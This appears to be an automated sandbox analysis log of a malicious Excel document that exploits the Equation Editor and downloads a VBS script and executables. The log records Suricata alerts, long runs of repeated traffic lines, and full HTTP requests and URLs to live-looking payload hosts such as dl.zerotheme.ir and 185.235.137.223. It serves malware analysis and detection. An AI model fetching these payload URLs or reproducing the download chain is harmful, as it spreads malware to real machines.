          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49173

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2019696 - Severity 1 - ET MALWARE Possible MalDoc Payload Download Nov 11 2014 : 192.168.2.22:49173 -> 185.18.213.20:443
          Potential malicious VBS script found (has network functionality)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDropped file: stream.SaveToFile filePath, 2 ' 2 to overwrite if the file existsJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDropped file: stream.SaveToFile filePath, 2 ' 2 to overwrite if the file existsJump to dropped file
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/bin.exe HTTP/1.1Host: dl.zerotheme.irConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1Host: dl.zerotheme.ir
          Source: Joe Sandbox ViewASN Name: AFRARASAIR AFRARASAIR
          Source: Joe Sandbox ViewASN Name: SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49174 -> 185.18.213.20:443
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficHTTP traffic detected: GET /Bg7UYE HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: strmr.coConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /90/ni/veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /90/seethedifferentofpicture.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49166 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49167 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49168 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9097DE45.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /Bg7UYE HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: strmr.coConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/bin.exe HTTP/1.1Host: dl.zerotheme.irConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1Host: dl.zerotheme.ir
          Source: global trafficHTTP traffic detected: GET /90/ni/veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /90/seethedifferentofpicture.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: strmr.co
          Source: global trafficDNS traffic detected: DNS query: dl.zerotheme.ir
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 08:27:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsvary: Accept-Encodingx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kJy05dMo0igFOolpdvbbqwB4JGkG7qnDsNNYYzikbVqyvuCmVXyv64piEX2N5KN0nxF4vlOweaT6VfyjwqIx5cQh%2B5EBseeCUMBdbzKxuSpds98ade7saeH8oQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9a1d669aa3c47f-EWR
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 08:27:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsvary: Accept-Encodingx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7GrX7Gnp1QGg7zkIEzzwlfPNbFY7ITEHCAG5vi9ac%2BDG8Qn1HapxL770bso0WaZhLO8f9X4W0HO7O1I0UnRUQy%2FjnZMYPz4XNaolIw2kz1rwHc7Bk2NMeDWeHQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9a1d6c799a4204-EWR
          Source: EQNEDT32.EXE, 0000000A.00000002.513586832.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/90/seethedifferentofpicture.vbs
          Source: EQNEDT32.EXE, 0000000A.00000003.512889309.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/90/seethedifferentofpicture.vbsP
          Source: EQNEDT32.EXE, 0000000A.00000002.513586832.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/90/seethedifferentofpicture.vbsj
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: temp_executable.exe, 0000000C.00000002.536992954.000000000263B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.zerotheme.ir
          Source: temp_executable.exe, 0000000C.00000002.536992954.000000000263B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.zerotheme.irX
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: temp_executable.exe, 0000000C.00000002.536992954.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: temp_executable.exe, 0000000C.00000002.536992954.000000000267F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536992954.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir
          Source: temp_executable.exe, 0000000C.00000002.536992954.00000000026DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll
          Source: temp_executable.exe, 0000000C.00000002.536992954.000000000267F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536857436.000000000069B000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536992954.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exe
          Source: temp_executable.exe, 0000000C.00000002.536992954.000000000259F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536992954.0000000002614000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536992954.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exebhttps://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll
          Source: temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: strmr.co.url.4.drString found in binary or memory: https://strmr.co/
          Source: QT2Q1292.xla.xlsx, Bg7UYE.url.4.drString found in binary or memory: https://strmr.co/Bg7UYE
          Source: ~DF548A65E297CEF6BA.TMP.0.dr, 0DE30000.0.drString found in binary or memory: https://strmr.co/Bg7UYEyX
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
          Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
